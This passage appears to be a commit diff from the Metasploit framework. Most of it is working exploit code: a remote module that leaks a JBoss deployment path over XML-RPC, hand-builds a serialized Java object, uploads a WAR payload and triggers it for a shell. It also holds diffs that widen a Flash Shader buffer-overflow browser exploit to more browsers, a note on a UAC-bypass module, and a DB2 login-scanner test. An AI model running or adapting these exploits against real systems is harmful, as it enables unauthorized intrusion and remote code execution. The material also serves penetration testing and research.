'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
xml.root.add_element("params")
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def parse_method_response(xml)
doc = Document.new(xml)
file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
unless file.nil?
file = Rex::Text.decode_base64(file.text)
end
file
end
def get_file(path)
xml_call = build_soap_get_file(path)
file = nil
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
file = parse_method_response(res.body.to_s)
end
file
end
def put_file(file)
result = nil
xml_call = build_soap_put_file(file)
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
result = parse_method_response(res.body.to_s)
end
result
end
def upload_war(war_name, war, dst)
result = false
java_file = build_java_file_info("#{dst}#{war_name}", war)
java_file = Rex::Text.encode_base64(java_file)
res = put_file(java_file)
if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
result = true
end
result
end
def jboss_deploy_path
path = nil
leak = get_file("bin/CreateDatabaseSchema.cmd")
if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
path = $1
end
path
end
def check
check_result = Exploit::CheckCode::Safe
if jboss_deploy_path.nil?
xml = build_soap_check_put
res = send_xml_rpc_request(xml)
if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
check_result = Exploit::CheckCode::Detected
end
else
check_result = Exploit::CheckCode::Appears
end
check_result
end
def exploit
print_status("#{peer} - Leaking the jboss deployment directory...")
jboss_path =jboss_deploy_path
if jboss_path.nil?
fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
end
print_status("#{peer} - Building WAR payload...")
app_name = Rex::Text.rand_text_alpha(4 + rand(4))
war_name = "#{app_name}.war"
war = payload.encoded_war({ :app_name => app_name }).to_s
deploy_dir = "..#{jboss_path}"
print_status("#{peer} - Uploading WAR payload...")
res = upload_war(war_name, war, deploy_dir)
unless res
fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
end
register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET',
'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def ste_port
datastore['STE_PORT']
end
# com.appstream.cm.general.FileInfo serialized object
def build_java_file_info(file_name, contents)
stream = "\xac\xed" # stream magic
stream << "\x00\x05" # stream version
stream << "\x73" # new Object
stream << "\x72" # TC_CLASSDESC
stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
stream << "com.appstream.cm.general.FileInfo"
stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [6].pack("n") # number of fields in the class
stream << "Z" # boolean
stream << ["bLastPage".length].pack("n")
stream << "bLastPage"
stream << "J" # long
stream << ["lFileSize".length].pack("n")
stream << "lFileSize"
stream << "[" # array
stream << ["baContent".length].pack("n")
stream << "baContent"
stream << "\x74" # TC_STRING
stream << ["[B".length].pack("n")
stream << "[B" # field's type (byte array)
stream << "L" # Object
stream << ["dTimeStamp".length].pack("n")
stream << "dTimeStamp"
stream << "\x74" # TC_STRING
stream << ["Ljava/util/Date;".length].pack("n")
stream << "Ljava/util/Date;" #field's type (Date)
stream << "L" # Object
stream << ["sContent".length].pack("n")
stream << "sContent"
stream << "\x74" # TC_STRING
stream << ["Ljava/lang/String;".length].pack("n")
stream << "Ljava/lang/String;" #field's type (String)
stream << "L" # Object
stream << ["sFileName".length].pack("n")
stream << "sFileName"
stream << "\x71" # TC_REFERENCE
stream << [0x007e0003].pack("N") # handle
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
# Values
stream << [1].pack("c") # bLastPage
stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
stream << "\x75" # TC_ARRAY
stream << "\x72" # TC_CLASSDESC
stream << ["[B".length].pack("n")
stream << "[B" # byte array)
stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [0].pack("n") # number of fields in the class
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
stream << [contents.length].pack("N")
stream << contents # baContent
stream << "\x70" # TC_NULL # dTimeStamp
stream << "\x70" # TC_NULL # sContent
stream << "\x74" # TC_STRING
stream << [file_name.length].pack("n")
stream << file_name # sFileName
stream
end
end

View File

@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
vulnerability occurs in the flash.Display.Shader class, when setting specially
crafted data as its bytecode, as exploited in the wild in April 2014. This module
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
Windows XP SP3, Windows 7 SP1 and Windows 8.
has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
# Disabled by default to allow sessions on Firefox, still useful when exploiting IE
#'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
},
@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
},
'Targets' =>
@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
</object>
</body>
</html>

View File

@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local
technique to drop only the DLL payload binary instead of three seperate
binaries in the standard technique. However, it requires the correct
architecture to be selected, (use x64 for SYSWOW64 systems also).
If specifying EXE::Custom your DLL should call ExitProcess() after starting
your payload in a seperate process.
},
'License' => MSF_LICENSE,
'Author' => [

View File

@ -0,0 +1,44 @@
require 'spec_helper'
require 'metasploit/framework/login_scanner/db2'
describe Metasploit::Framework::LoginScanner::DB2 do
let(:public) { 'root' }
let(:private) { 'toor' }
let(:test_cred) {
Metasploit::Framework::LoginScanner::Credential.new( public: public, private: private )
}
subject(:login_scanner) { described_class.new }
it_behaves_like 'Metasploit::Framework::LoginScanner::Base'
it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
context '#attempt_login' do
context 'when the socket errors' do
it 'returns a connection_error result for an Rex::ConnectionError' do
my_scanner = login_scanner
my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionError
result = my_scanner.attempt_login(test_cred)
expect(result.status).to eq :connection_error
expect(result.proof).to eq ::Rex::ConnectionError.new.to_s
end
it 'returns a connection_error result for an Rex::ConnectionTimeout' do
my_scanner = login_scanner
my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionTimeout
result = my_scanner.attempt_login(test_cred)
expect(result.status).to eq :connection_error
expect(result.proof).to eq ::Rex::ConnectionTimeout.new.to_s
end
it 'returns a connection_error result for an ::Timeout::Error' do
my_scanner = login_scanner
my_scanner.should_receive(:connect).and_raise ::Timeout::Error
result = my_scanner.attempt_login(test_cred)
expect(result.status).to eq :connection_error
expect(result.proof).to eq ::Timeout::Error.new.to_s
end
end
end
end